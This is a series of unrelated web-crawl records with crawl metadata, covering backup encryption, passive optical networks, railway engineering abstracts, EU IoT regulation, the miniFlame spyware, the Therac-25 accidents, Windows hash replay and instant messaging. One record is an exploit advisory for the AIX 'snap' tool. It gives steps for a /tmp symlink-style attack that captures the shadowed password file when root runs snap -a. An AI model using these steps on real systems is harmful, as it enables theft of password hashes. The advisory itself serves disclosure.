Encryption uses a mathematical algorithm that transforms source information into non-readable cipher text. The goal of backup encryption is to make data unintelligible to unauthorized readers and extremely difficult to decipher when attacked. Data that is backed up over the Internet must be encrypted before the first bit leaves your organization and travels over the WAN (backup encryption in flight). When the data arrives at its destination, it should remain encrypted as well (backup encryption at rest). Backup encryption both in flight and at rest ensures that backups are secure, both across the Internet and in the backup repository itself. NAKIVO Backup & Replication uses AES-256 encryption, the de facto worldwide encryption standard used to secure online information and transactions by the likes of financial institutions, banks and e-commerce sites. Backup encryption in flight is performed by a pair of Transporters. The Transporter is a component of NAKIVO Backup & Replication that performs all of the data protection and recovery tasks, including data read, compression, deduplication, encryption, transfer, write, verification, granular and full VM recovery, and so on. The source Transporter for the offsite backup encrypts and sends the data; the target Transporter receives and decrypts it. For example, when you send backup copies over the WAN to an offsite location, the Transporter installed at the source site compresses and encrypts VM data before transferring it over the WAN. Then, the Transporter installed at the target site receives and decrypts the data prior to writing it to the backup repository. It is equally important for data at rest to be secured by encryption. NAKIVO Backup & Replication provides the ability to encrypt backup repositories so that backup data at rest, housed in the repository itself, is secure. With the added benefits of in-flight and at-rest data encryption, NAKIVO Backup & Replication ensures your data is not only safe but also secure.
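To make the mechanics concrete, here is a minimal Python sketch of AES-256 encryption for a chunk of backup data, using the widely available cryptography package in authenticated GCM mode. The function names and the nonce-prefixed blob format are illustrative assumptions for this example, not NAKIVO's actual implementation.
import os
from cryptography.hazmat.primitives.ciphers.aead import AESGCM  # pip install cryptography

def encrypt_backup_chunk(key: bytes, plaintext: bytes) -> bytes:
    # AES-256-GCM: confidentiality plus an integrity tag, so tampering is detected.
    nonce = os.urandom(12)  # must be unique per chunk under the same key
    return nonce + AESGCM(key).encrypt(nonce, plaintext, None)

def decrypt_backup_chunk(key: bytes, blob: bytes) -> bytes:
    nonce, ciphertext = blob[:12], blob[12:]
    return AESGCM(key).decrypt(nonce, ciphertext, None)  # raises if data was altered

key = AESGCM.generate_key(bit_length=256)  # the 256-bit AES key both ends would share
blob = encrypt_backup_chunk(key, b"VM disk block ...")
assert decrypt_backup_chunk(key, blob) == b"VM disk block ..."
In flight, the source side would run something like encrypt_backup_chunk before transmission and the target side decrypt_backup_chunk on receipt; at rest, the same primitive protects blocks written to the repository.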
<urn:uuid:6aefad58-c705-492f-8fea-f98d3d052dab>
CC-MAIN-2017-04
https://www.nakivo.com/features/backup-encryption.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280425.43/warc/CC-MAIN-20170116095120-00198-ip-10-171-10-70.ec2.internal.warc.gz
en
0.915956
409
2.859375
3
PON (Passive Optical Network) refers to a fiber-optic access network whose optical distribution network contains no active electronic devices and requires no electrical power: the optical distribution network (ODN) consists entirely of optical splitters and other passive components, with no need for expensive electronic equipment. PON reduces the amount of fiber and central office equipment required compared with point-to-point architectures. A PON consists of an optical line terminal (OLT) at the service provider's central office and a number of optical network units (ONUs) near end users. The optical distribution network between the OLT and the ONUs comprises optical fiber and passive optical splitters or fiber optic couplers. An OLT, generally an Ethernet switch, router, or multimedia conversion platform, is located at the central office (CO) as the core device of the whole EPON system, providing core data and video-to-telephone network interfaces for the EPON and the service provider. ONUs are used to connect customer premise equipment, such as PCs, set-top boxes (STBs), and switches. Generally placed in customers' homes, in corridors, or at roadsides, ONUs are mainly responsible for forwarding uplink data sent by customer premise equipment (from ONU to OLT) and selectively receiving downlink broadcasts forwarded by OLTs (from OLT to ONU). An ODN consists of optical fibers, one or more passive optical splitters (POSs), and other passive optical components. ODNs provide optical signal transmission paths between OLTs and ONUs. A POS can couple uplink data into a single piece of fiber and distribute downlink data to the respective ONUs. There are two principal passive optical network technologies: Ethernet PON (EPON) and gigabit PON (GPON). EPON and GPON are applied in different situations, and each offers its own advantages in subscriber access networks. EPON focuses on FTTH applications, while GPON focuses on full service support, including both new services and existing traditional services such as ATM and TDM. EPON is a passive optical network which carries Ethernet frames encapsulated according to the 802.3 standards. It is a combination of Ethernet technology and PON technology in compliance with the IEEE 802.3ah standards issued in June 2004. A typical EPON system consists of three components: the EPON OLT, the EPON ONU and the EPON ODN. It has many advantages, such as lower operation and maintenance costs, long reach and higher bandwidth. GPON utilizes a point-to-multipoint topology. The GPON standard differs from other PON standards in that it achieves higher bandwidth and higher efficiency using larger, variable-length packets, and GPON is generally considered the strongest candidate for widespread deployments. GPON has a downstream capacity of 2.488 Gb/s and an upstream capacity of 1.244 Gb/s that is shared among users. There are also many differences between EPON and GPON. EPON, based on Ethernet technology, is compliant with the IEEE 802.3ah Ethernet in the First Mile standard that is now merged into the IEEE Standard 802.3-2005; it is a solution for the "first mile" optical access network. GPON, on the other hand, is an important approach to enabling a full service access network. Its requirements were set forth by the Full Service Access Network (FSAN) group and later adopted by ITU-T as the G.984.x standards – an addition to ITU-T recommendation G.983, which details broadband PON (BPON). Both EPON and GPON are accepted as international standards.
They cover the same network topology methods and FTTx applications, and incorporate the same WDM technology, delivering the same wavelengths both upstream and downstream together with a third wavelength. PON technology provides triple-play, Internet Protocol TV (IPTV) and cable TV (CATV) video services.
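Because every split divides the downstream optical power, a quick link-budget check is a common design step. The Python sketch below is a back-of-the-envelope illustration: an ideal 1:N splitter adds about 10*log10(N) dB of loss, and the loss and sensitivity figures used here are typical placeholder values, not figures taken from the EPON or GPON specifications.
import math

def pon_power_budget(tx_dbm, rx_sens_dbm, fiber_km, split_ratio,
                     fiber_loss_db_per_km=0.35, connector_loss_db=1.0,
                     splitter_excess_db=1.0):
    # An ideal 1:N splitter divides power N ways: 10*log10(N) dB of splitting loss.
    split_loss = 10 * math.log10(split_ratio) + splitter_excess_db
    total_loss = fiber_km * fiber_loss_db_per_km + connector_loss_db + split_loss
    margin = tx_dbm - total_loss - rx_sens_dbm  # what is left over as safety margin
    return total_loss, margin

# Example: 20 km of fiber feeding a 1:32 splitter
loss, margin = pon_power_budget(tx_dbm=2.0, rx_sens_dbm=-28.0, fiber_km=20, split_ratio=32)
print(f"path loss: {loss:.1f} dB, margin: {margin:.1f} dB")
With these illustrative numbers the link has roughly 6 dB of margin, which is why doubling the split ratio (an extra ~3 dB of loss) directly trades reach against the number of subscribers per fiber.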
<urn:uuid:36a003b5-eaaf-45dd-9e8d-05774ffd0e9d>
CC-MAIN-2017-04
http://www.fs.com/blog/epon-and-gpon-of-passive-optical-network.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280133.2/warc/CC-MAIN-20170116095120-00134-ip-10-171-10-70.ec2.internal.warc.gz
en
0.932825
825
3.25
3
Zeng Q.-Y., China Railway Siyuan Survey and Design Institute Group Co. Yantu Gongcheng Xuebao/Chinese Journal of Geotechnical Engineering | Year: 2010 On January 21, 2006, water and mud burst out of the '978' high-pressure, water-filled cavern at the exit of the Maluqing tunnel. The instantaneous water inflow was 300 thousand cubic meters per hour. To ensure the safety of construction and traffic, a 4700 m drainage tunnel was built to release the karst water in the Maluqing tunnel. Releasing the karst water involved the following four stages: water release by boring, water release through a high-placed hole, water release through a low-placed drainage tunnel, and automatic release of water, mud and rock due to strong rainfall. The water release mechanism is summarized based on the measured data. Releasing water by boring can reduce the water pressure, but the release capacity is limited because the borings become blocked. Releasing water through the high-placed hole has a certain effectiveness; but if the hole encounters the cavern, continued construction becomes difficult, which limits the release capacity. Once the drainage tunnel connects with the cavern, water, mud and rock are released through the drainage tunnel whenever the rainfall is strong. The cavern is thus continuously dredged, and the water release function is satisfied. The maximum water release corresponds to the rainfall. Source
Zhu J., China Railway Siyuan Survey and Design Institute Group Co. Journal of Railway Engineering Society | Year: 2013 Research purposes: In recent years, attention has turned to the influence of lightning on the electrified railway. Lightning activity in heavy-lightning areas, in particular, brings serious harm to electrified railways in those areas. Lightning protection technology is important for ensuring the reliability of the power supply system of the electrified railway, so protection measures must be strengthened and the protection technology enhanced. Research conclusions: Three lines of defense should be built for lightning protection of the substation to prevent lightning strikes from hitting substation devices, and three levels of prevention should be built to avoid failures of the substation's low-voltage devices caused by rising earth potential or by induced voltages and currents. Measures should also be taken to keep the earthing system in good working order. The lightning protection engineering for the substation should include the means mentioned above. Source
Liu Q.-J., China Railway Siyuan Survey and Design Institute Group Co. Wuhan Ligong Daxue Xuebao/Journal of Wuhan University of Technology | Year: 2014 Taking the Jijiang Yangtze River bridge in Chongqing as an example, the coupled vibration of wind, vehicle and bridge for light rail-cum-road suspension bridges was studied. First, using the principle that the total potential energy of an elastic system in dynamics is constant, together with the matrix "reserved seats" method, the dynamic equations of the suspension bridge and of the vehicle-bridge coupling system were established. Then, for the Jijiang Yangtze River bridge, the random wind field at the bridge site was simulated. Using numerical wind tunnel technology, the three-component coefficients of the train, the girder and the train-girder system model were calculated.
On this basis, the coupled wind-vehicle-bridge vibration analysis for the Jijiang Yangtze River bridge was carried out. The results show that when the wind speed is not more than 25 m/s, the designed bridge can meet the requirements of train safety and comfort, and satisfies the train operation control standards adopted in China for high winds. This shows that the influence of the bridge on train operation under strong winds does not become a controlling factor for the whole railway line. Source
Luo S., China Railway Siyuan Survey and Design Institute Group Co. | Rao S., China Railway Siyuan Survey and Design Institute Group Co. Zhongguo Tiedao Kexue/China Railway Science | Year: 2011 According to the mechanical characteristics of the curved cable-stayed bridge for a four-track railway, structural design and research on the cables, girder, bridge towers and foundation construction were carried out by the space bar finite element static analysis method, addressing the cable-stayed bridge architecture, the bridge stiffness, shrinkage and creep, geometric nonlinearity, etc. FEM analysis was used to study the stress distribution of the orthotropic steel box decks under the combined effects of vertical and horizontal bending, shear lag and torsion warping. With FEM simulation, local stress analysis and structural research were carried out on several details, such as the joint section between the steel box girder and the prestressed concrete beam, the consolidation area between the main girder and the crossbeam of the bridge tower, and the upper and lower steel anchor boxes for the stay cables. The vehicle-bridge coupled time-varying analysis method was adopted to study the dynamic performance of running trains. The response spectrum method and the seismic time history analysis method were used to analyze the seismic performance and seismic measures of the structure. The analyses show that the roughly 3 m spacing between the diaphragms and the web plates adopted for the steel box girder plays an important role in improving the main beam structure of the curved cable-stayed bridge for a four-track railway. Good train running performance indicates that the deflection-to-span ratio of 1/900 adopted to control the structural stiffness is reasonable. E-type steel damping bearings have improved the seismic performance of the bridge. Source
Gong Y.-F., China Railway Siyuan Survey and Design Institute Group Co. | Zhang J.-R., Southwest Jiaotong University | Xu X.-D., China Railway Siyuan Survey and Design Institute Group Co. | Tang Z., China Railway Siyuan Survey and Design Institute Group Co. Journal of Railway Engineering Society | Year: 2015 Research purposes: In dangerous and difficult mountainous areas, affected by railway station layout and contact line forks, there will be multi-line station tunnels and variable-section tunnels, which may even form a super-large-section tunnel. When a shallow tunnel is located in a stratum of completely weathered granite with abundant water, tunnel construction faces the following security risks: the topographic and geological conditions are poor and the groundwater is well developed, so collapse occurs easily; the forces on the primary support are large and deformation is difficult to control, so there is a risk that deformation intrudes into the structural clearance, with loss of stability and collapse; and the tunnel must be excavated and supported repeatedly, with difficult force transfer and a high security risk when supports are removed and replaced.
Since there are few examples and little research at home and abroad on super-large-cross-section shallow tunnels in strata of completely weathered granite with abundant water, the problem is studied in this paper on the basis of a practical engineering project. Research conclusions: This paper summarizes current construction technology for super-large-section tunnels at home and abroad, analyzes the mechanical behavior of the tunnel during the construction process, and establishes advance support measures, lining support parameters and construction methods. The main conclusions are as follows: (1) Construction of a super-large-section tunnel in a stratum of completely weathered granite with abundant water is difficult, with high security risk and high cost; practical supporting measures and construction methods should be developed for the specific conditions of the tunnel project. (2) To control primary support deformation and the conversion of primary supporting measures in such a tunnel, a large wall foundation and multiple supporting measures are necessary. (3) To control the deformation of soft, water-rich strata and the deformation and collapse of the super-large cross section, strong advance reinforcement and reinforcement of the tunnel face should be adopted. (4) The research results can provide a reference for the design and construction of super-large-section tunnels in soft strata. © 2015, Editorial Department of Journal of Railway Engineering Society. All right reserved. Source
<urn:uuid:f1f321b2-2d65-4041-a852-02bf9b3ca29a>
CC-MAIN-2017-04
https://www.linknovate.com/affiliation/china-railway-siyuan-survey-and-design-group-co-157475/all/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280825.87/warc/CC-MAIN-20170116095120-00528-ip-10-171-10-70.ec2.internal.warc.gz
en
0.933074
1,683
2.765625
3
The European Commission is calling for opinions on how to regulate wirelessly connected devices, as legal experts say the current Data Protection Directive is not up to the job. Digital Agenda Commissioner Neelie Kroes last week launched a public consultation on the so-called "Internet of things" to try to find the right balance between privacy and convenience. "The current directive is certainly not designed with this technology in mind," said Kathryn Wynn, senior associate at legal firm Pinsent Masons, adding that it is likely that a lot of the more intrusive communications (such as alerts to devices or device-tracking) would not be considered to be "personal data" under the existing legislation. Household devices, most obviously smartphones and laptops, are already connected wirelessly, but the number of devices that can connect to the Internet is set to grow dramatically in coming years. The Commission estimates that currently the average person has two devices connected to the Internet, but expects this to rise to seven by 2015. This creates a potential minefield for regulators with regard to interoperability and privacy issues. These devices will collect, share and store data. The European Commission wants to ensure an adequate level of control over what can be done with that data. Kroes said she was chiefly concerned with "preserving security, privacy and the respect of ethical values." The new draft Data Protection Regulation, which was published in January, does seek to address some issues relating to newer technology, such as location data. But it will not come into force for at least another two years, points out Wynn. "It is likely that the technology will have moved on leaps and bounds by that stage. This is a classic example of the issue that the E.U. Commission is facing; the legislation simply cannot keep up with the pace of technology," she said. The other big question raised by the trend toward connected devices is how to manage interoperability, governance and standards. The EC survey calls for all interested parties to submit their ideas and respond to questions by July 12. The results of the consultation will feed into the Commission's recommendation on the Internet of things, which will be presented by summer 2013.
<urn:uuid:bebba013-62bd-4b18-aff5-aef2eb9a8d61>
CC-MAIN-2017-04
http://www.cio.com/article/2397164/internet/eu-asks-for-help-on-regulating-the-internet-of-things.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281574.78/warc/CC-MAIN-20170116095121-00344-ip-10-171-10-70.ec2.internal.warc.gz
en
0.96661
442
2.640625
3
What is Hardware Engineering? Hardware engineering is the process of designing, developing, testing and producing computer systems and the various physical components related to them. With advances in technology and R&D, the scope of hardware engineering has expanded to include hardware devices that enable embedded software engineering in non-computer devices. In embedded systems, hardware engineering comprises the design and development of all electronics-related hardware, such as sensors, processors and controllers. The scope of hardware engineering is not limited to the design and development of computer or embedded systems; it also covers integrating the various devices needed for an entire business system to function. Hardware engineering is now prevalent in newer fields such as mobile computing, distributed systems, computer vision and robotics.
<urn:uuid:eb3b4d14-9d3d-4534-be74-3dbeebb49bf4>
CC-MAIN-2017-04
https://www.hcltech.com/technology-qa/what-is-hardware-engineering
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280504.74/warc/CC-MAIN-20170116095120-00464-ip-10-171-10-70.ec2.internal.warc.gz
en
0.93959
165
3.34375
3
Hopefully for the dignity of their respective species, chimpanzees and orangutans don't embarrass themselves in middle age as so many humans do. But even if they don't resort to comb-overs and chin lifts, it turns out that, like humans, chimpanzees and orangutans can suffer from mid-life crises. A new study published in the Proceedings of the National Academy of Sciences of the USA by an international team of researchers indicated that chimpanzees and orangutans -- who along with humans and gorillas comprise the Great Apes -- follow the same U-shaped pattern of lifetime well-being that features a trough (depression) in middle age sandwiched by high levels of happiness in youth and old age. The research was led by Professor Andrew Oswald from the University of Warwick (England) and psychologist Dr Alex Weiss from the University of Edinburgh (Scotland), who were interested in determining whether the U-pattern of emotional well-being was common among the Great Apes. From the University of Warwick: The authors studied 508 great apes housed in zoos and sanctuaries in the United States, Japan, Canada, Australia and Singapore. The apes' well-being was assessed by keepers, volunteers, researchers and caretakers who knew the apes well. Their happiness was scored with a series of measures adapted from human subjective well-being measures.Professor Oswald said: "We hoped to understand a famous scientific puzzle: Why does human happiness follow an approximate U-shape through life? We ended up showing that it cannot be because of mortgages, marital breakup, mobile phones, or any of the other paraphernalia of modern life. Apes also have a pronounced midlife low, and they have none of those." True, we humans are materialistic and shallow, but at least we don't have to pick bugs off each other! OK, that was a cheap shot. I apologize to the other Great Apes who are reading this. Seriously, the research raises fascinating questions about whether Great Apes have a higher consciousness, think about the future, are aware of mortality or harbor personal regrets.
<urn:uuid:6de36dbe-09e2-4ad8-a513-c0fbb3c6db7b>
CC-MAIN-2017-04
http://www.itworld.com/article/2718225/enterprise-software/if-you-see-a-balding-orangutan-driving-a-red-sports-car--here-s-why.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281263.12/warc/CC-MAIN-20170116095121-00124-ip-10-171-10-70.ec2.internal.warc.gz
en
0.960462
430
2.71875
3
Like its big cousins Flame and Gauss, miniFlame is designed to steal data and control infected machines. However, rather than casting a wide net, it acts as an in-depth tool. Kaspersky estimates that unlike Flame or Gauss, which had high infection counts, the number of miniFlame infections is much smaller, falling between 10 and 20 machines now and accounting for only 50–60 infections worldwide to date. "The number of infections combined with miniFlame's info-stealing features and flexible design indicate it was used for extremely targeted cyber-espionage operations, and was most likely deployed inside machines that were already infected by Flame or Gauss," Alexander Gostev, chief security expert at Kaspersky Lab, said in a research note. Kaspersky originally found miniFlame in July 2012 and identified it as a Flame module. However, a deeper look has revealed that it is an interoperable tool in its own right, capable of being deployed as an independent malicious program that operates as a backdoor designed for data theft and for opening up direct access to infected systems by a remote operator. Additional info-stealing capabilities include making screenshots of an infected computer while it is running a specific program or application, such as a web browser, Microsoft Office program, Adobe Reader, instant messenger service or FTP client. Separately, at the request of miniFlame's command-and-control operator, an additional data-stealing module can be sent to an infected system; it infects USB drives and uses them to store data collected from infected machines without an internet connection. miniFlame can also be used as a plug-in for both the Flame and Gauss malware, indicating cooperation between the creators of those two pieces of spyware, Kaspersky noted. "Since the connection between Flame and Stuxnet/Duqu has already been revealed, it can be concluded that all these advanced threats come from the same cyber-warfare factory," Gostev said. "miniFlame is a high precision attack tool," said Gostev. "Most likely it is a targeted cyber-weapon used in what can be defined as the second wave of a cyberattack." For example, first, Flame or Gauss is used to infect as many devices as possible to collect large quantities of information. After the data is collected and reviewed, a potentially interesting victim is defined and identified, and miniFlame is installed in order to conduct more in-depth surveillance and cyber-espionage. Development of miniFlame might have started as early as 2007, Kaspersky said, continuing until the end of 2011, with many variants created. To date, Kaspersky has identified six of these variants, covering two major generations: 4.x and 5.x.
<urn:uuid:5862df71-a7f1-4069-b813-81c7ac98b7d4>
CC-MAIN-2017-04
https://www.infosecurity-magazine.com/news/miniflame-emerges-as-small-highly-targeted-cyber/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281263.12/warc/CC-MAIN-20170116095121-00124-ip-10-171-10-70.ec2.internal.warc.gz
en
0.958405
595
2.609375
3
source: http://www.securityfocus.com/bid/375/info The snap command is a diagnostic utility for gathering system information on AIX platforms. It can only be executed by root, but it copies various system files into /tmp/ibmsupt/; under /tmp/ibmsupt/general/ you will find the passwd file with its ciphertext. The danger here is that if a system administrator executes snap -a, as sometimes requested by IBM support while diagnosing a problem, it defeats password shadowing. Because /tmp/ibmsupt is created with 755 permissions, a local user may carry out a symlink attack and gain access to the password file. snap is a shell script which uses cp -p to gather system information. Data from /etc/security is gathered between lines 721 - 727. Seeing that snap uses the /tmp/ibmsupt/general directory, someone may create the directory as a normal user (tested on AIX 4.2.1). The user may then do a touch on /tmp/ibmsupt/general/passwd. Once the passwd file is created, do tail -f /tmp/ibmsupt/general/passwd. If in another session someone logs in as root and runs snap -a, this will cause the contents of /etc/security/passwd to show up in the tail output. Related Exploits Trying to match CVEs (1): CVE-1999-1405 Trying to match OSVDBs (1): 8017 Other Possible E-DB Search Terms: IBM AIX 4.2.1 snap, IBM AIX
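The underlying flaw is a predictable, world-readable collection path that an unprivileged user can pre-create. As a hedged illustration of the defensive idea (not a patch for the actual snap script, which is a shell script), the hypothetical Python check below refuses to reuse a collection directory unless it is a genuine, root-owned directory that nobody else can write to or read from.
import os, stat

def safe_support_dir(path="/tmp/ibmsupt"):
    # Reject symlinks outright: a pre-planted link is the classic attack here.
    if os.path.islink(path):
        raise RuntimeError(f"{path} is a symlink - refusing to use it")
    if not os.path.exists(path):
        os.mkdir(path, 0o700)  # create privately (0700) instead of 755
        return path
    st = os.lstat(path)
    if not stat.S_ISDIR(st.st_mode):
        raise RuntimeError(f"{path} is not a directory")
    if st.st_uid != 0 or stat.S_IMODE(st.st_mode) & 0o077:
        raise RuntimeError(f"{path} has unsafe ownership or permissions")
    return path
A race between the check and the use (TOCTOU) is still possible in principle; real hardening would create the directory atomically with restrictive permissions before any sensitive file is copied into it.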
<urn:uuid:97173848-b36d-4d4a-80b9-fc119d3cb22a>
CC-MAIN-2017-04
https://www.exploit-db.com/exploits/19300/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279489.14/warc/CC-MAIN-20170116095119-00336-ip-10-171-10-70.ec2.internal.warc.gz
en
0.882907
337
2.921875
3
DoS – Denial of Service attack
A DoS attack is designed to interfere with the normal functioning of a server, web site, or other network resource. Hackers and even virus writers can use a number of ways to get this job done. One of the most common methods is flooding a server with heavy network traffic so that it can no longer cope. As a result of this heavy traffic, the server cannot carry out its normal functions properly, and sometimes this can lead to a server crash. The only difference in the case of a DDoS attack is that multiple machines are used to conduct it. Master and zombie machines are used by hackers or virus writers to coordinate the attack with one another; these machines are usually recruited by exploiting an application vulnerability in order to install malicious code, such as a Trojan.
DDoS – Distributed Denial of Service attack
There is not much difference between a DDoS attack and a DoS attack, as both are designed to create hindrance in the normal functions of a server, web site, or other network resources. In the case of a DDoS attack, the attack takes place with the help of multiple machines, which makes it different from a DoS attack. Here are the symptoms of denial-of-service attacks:
- The performance of the network becomes unusually slow, for example when accessing web sites or opening files
- A particular web site becomes unavailable
- It becomes difficult to access any web site
- A noticeable increase in the number of spam emails received; this kind of DoS attack is referred to as an e-mail bomb
The problems due to denial-of-service attacks are not limited to the computer that is being attacked; they also cause trouble for the network 'branches' around it. For example, the router's bandwidth between the LAN and the Internet may be consumed by an attack, and this can spread to the whole network. If the attack takes place on a big scale, then the internet connectivity of a whole geographical region can be affected, often without the knowledge or intention of the attacker, due to incorrect configuration or weak network infrastructure devices.
Picture source: cisco.com
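On the defensive side, the simplest detection heuristic is to watch per-source request rates. The Python sketch below is a naive sliding-window detector with made-up threshold numbers; it illustrates the idea but would not, on its own, catch a distributed attack, where the load is deliberately spread across many source addresses.
import time
from collections import defaultdict, deque

WINDOW_SECONDS = 10
THRESHOLD = 100  # max requests per source per window (illustrative value)
recent = defaultdict(deque)  # source IP -> timestamps of its recent requests

def record_request(src_ip):
    # Slide the window forward and flag sources that exceed the threshold.
    now = time.time()
    q = recent[src_ip]
    q.append(now)
    while q and now - q[0] > WINDOW_SECONDS:
        q.popleft()
    return len(q) > THRESHOLD  # True -> candidate for rate limiting or blocking

# Simulate a burst from a single flooding host
for _ in range(150):
    flagged = record_request("203.0.113.7")
print("flagged:", flagged)
Real mitigations layer many such signals (SYN rates, connection states, upstream scrubbing) because a single threshold is easy for an attacker to slip under.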
<urn:uuid:d678efb0-eb2f-44e3-aabf-93c3ed0d7e38>
CC-MAIN-2017-04
https://howdoesinternetwork.com/2012/dos-ddos
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280888.62/warc/CC-MAIN-20170116095120-00060-ip-10-171-10-70.ec2.internal.warc.gz
en
0.94326
474
3.6875
4
But all software has bugs. For every thousand lines of code developed by commercial software makers or corporate programmers there could be as many as 20 to 30 bugs, according to William Guttman, the director of the SCC, a group of businesses and academic institutions looking for ways to make software more dependable. Many common programs have a million or more lines of code. Sun says its Solaris operating system has more than 10 million. "In a one-million-line piece of code, even if you only have one bug per thousand lines, you're still going to have 1,000 bugs," says Michael Sowers, executive vice president at Software Development Technologies, a software-testing company. In today's software, says Khosla, "you have to assume there are some bugs in the code." Just look back at the first major case of code that killed, in healthcare. The Therac-25 was one of the first "dual-mode" radiation-therapy machines, which meant that it could deliver both electron and photon treatments. Electrons are used to radiate surface areas of the body to kill cancer cells. A photon beam, normally called an X-ray, can be a hundred times more powerful and as a result is used to deliver cancer-killing radiation treatments deeper into the body. According to Prof. Leveson's account, the machine was "more compact, more versatile, and arguably easier to use" than its predecessor. But, according to Prof. Leveson's 1995 book "Safeware" and other accounts, there were a number of flaws in the software that led to the Therac-25 radiation overdoses at health facilities in Marietta, Ga.; Tyler, Texas; Yakima, Wash.; and elsewhere. In all, three people died. One of the problems manifested itself in 1986 when a physicist tried to change machine set-up data, such as radiation dosage and treatment time, that had been keyed into the software. The machine went through a series of steps to set itself up to deliver either electrons or photons and the dosage of the selected beam. As data was given, the machine recorded the information and then followed the instructions. In some cases, however, operators realized while setting up the machine that they had entered an incorrect piece of information. This could be as simple as unintentionally typing in an "X" for an X-ray (or photon) treatment instead of an "E" for an electron treatment. In "fixing" that designation, an operator would move the cursor up to the "treatment mode" line and type in an "E." The monitor displayed the new entry, seemingly telling the operator that the change was made. But in the case of the Therac-25, the software did not accept any changes while going through its eight-second-long set-up sequence. No matter what the screen might show, the software grabbed only the first entry. The second would be ignored. Unaware the changes did not register, operators turned on the beams and delivered X-rays when they thought they were delivering electrons. According to Leveson's account, patients received such incredibly high quantities of radiation that the beams burned their bodies. Patients who should have received anywhere from 100 to 200 rads of radiation were hit instead with 10,000 to 15,000 rads, in just one or two seconds. A thousand rads is a lethal dose.
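To make the failure mode concrete, here is a deliberately simplified Python toy model of the class of bug described above: the setup routine latches the operator's entry once, so an edit made while setup is running updates the screen but never reaches the machine. All names and the shortened timing are invented for illustration; this is not the Therac-25's actual code.
import threading, time

class TreatmentConsole:
    def __init__(self):
        self.entered_mode = "X"   # what the operator typed (and what the screen shows)
        self.active_mode = None   # what the setup routine actually latched

    def begin_setup(self):
        # Bug: the mode is read exactly once, at the start of setup.
        self.active_mode = self.entered_mode
        time.sleep(2)             # stand-in for the eight-second magnet positioning

    def operator_edit(self, new_mode):
        # The display updates, but begin_setup() never looks at this again.
        self.entered_mode = new_mode

console = TreatmentConsole()
setup = threading.Thread(target=console.begin_setup)
setup.start()
time.sleep(0.5)
console.operator_edit("E")        # operator "fixes" X -> E mid-setup
setup.join()
print("screen shows mode:", console.entered_mode)   # E
print("beam fires in mode:", console.active_mode)   # X - the stale value
The fix for this class of bug is equally simple to state: either re-read and re-validate all inputs at the end of setup, or lock out edits entirely until setup completes.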
<urn:uuid:fbb5d737-2901-4cd4-be50-8d7d0235a184>
CC-MAIN-2017-04
http://www.eweek.com/c/a/Web-Services-Web-20-and-SOA/Can-Software-Kill/7
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281331.15/warc/CC-MAIN-20170116095121-00546-ip-10-171-10-70.ec2.internal.warc.gz
en
0.965204
725
3.078125
3
Significant advances in technology and shifts in economies and culture are bringing about a new age of intelligent tools that are aware, can make sense of their surroundings, and are socially cognizant of the people who are using them. Sentient tools are the next step in the development of computational systems, Smart Cities and environments, autonomous systems, artificial intelligence (AI), Big Data and data mining, and an interconnected system in the Internet of Things (IoT). These tools are “what comes next” and emerge from a base of computational, sensing, and communications technologies that have been advancing over the last 50 years. The "awareness" of these sentient tools is not comparable to a human level of consciousness. They are not meant to mimic, mirror, or replace human interaction. These tools are designed for specific physical and virtual tasks that could be vastly complex but are not meant to replace humans. Conversely, they are meant to work alongside the human labor force. The rise of sentient tools will have a significant impact on the global work force and education, leaving practically no industry unaffected.
<urn:uuid:5752ab90-33e4-46fa-8007-7f35cc80763b>
CC-MAIN-2017-04
http://www.frost.com/sublib/display-market-insight.do?id=296998960
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279657.18/warc/CC-MAIN-20170116095119-00180-ip-10-171-10-70.ec2.internal.warc.gz
en
0.936181
220
3.0625
3
When I first became interested in computer security in the late 1990s, everything was about capturing hashes and cracking them using tools like John the Ripper. Now (in 2011), things are much different. Instead of capturing and cracking, it's now popular (and has been for some time) to simply intercept and replay the hashes themselves to become the target user. This page will cover the fundamentals behind performing these types of attacks. What is a Hash? First of all, we're not using the term hash in any technical sense here, as it has many meanings that are already defined elsewhere. Here we're talking about Windows–specifically NT–hashes. That being said, a Windows hash is an artifact of prior successful authentication. It is something that is presented to another system to prove that a user or account is valid, i.e. it's authentication, not authorization (just because you are who you say you are doesn't mean you're allowed to do anything). This is the part that gets confusing in Windows; there are many hashes that are used within the operating system, and many of them are quite different from each other. Here are the main ones:
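As one concrete anchor for the discussion: the NT hash is commonly described as an unsalted MD4 digest of the UTF-16LE-encoded password, which is exactly why capturing it is as good as capturing the password for replay purposes. A minimal Python sketch (note that MD4 availability through hashlib depends on the underlying OpenSSL build, so this may raise an error on hardened systems):
import hashlib

def nt_hash(password: str) -> str:
    # NT hash: MD4 over the UTF-16LE password bytes - no salt, no iteration.
    return hashlib.new("md4", password.encode("utf-16le")).hexdigest()

print(nt_hash("Password1"))  # the same input always yields the same hash
Because there is no salt, the hash is a stable, reusable credential: anyone who obtains it can authenticate as the user without ever learning the password itself, which is the essence of pass-the-hash.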
<urn:uuid:51b4e0e3-ce96-4be2-aaee-08bacd381776>
CC-MAIN-2017-04
https://danielmiessler.com/study/windows-hashes/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279657.18/warc/CC-MAIN-20170116095119-00180-ip-10-171-10-70.ec2.internal.warc.gz
en
0.963812
252
3.28125
3
Using Instant Messaging as a Support Resource
Once a toy for Internet users, instant messaging is gaining acceptance in the workplace. The future of IM will go far beyond the consumer desktop. In this article, we'll look at instant messaging (IM) and its growing use in the workplace. What started out as a toy for the Internet is growing in popularity among business users. Many valid applications for this technology exist in the workplace.
How It Works
